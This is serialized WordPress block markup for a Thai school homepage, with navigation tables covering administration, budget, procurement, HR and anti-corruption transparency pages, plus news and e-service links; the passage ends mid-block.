class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image 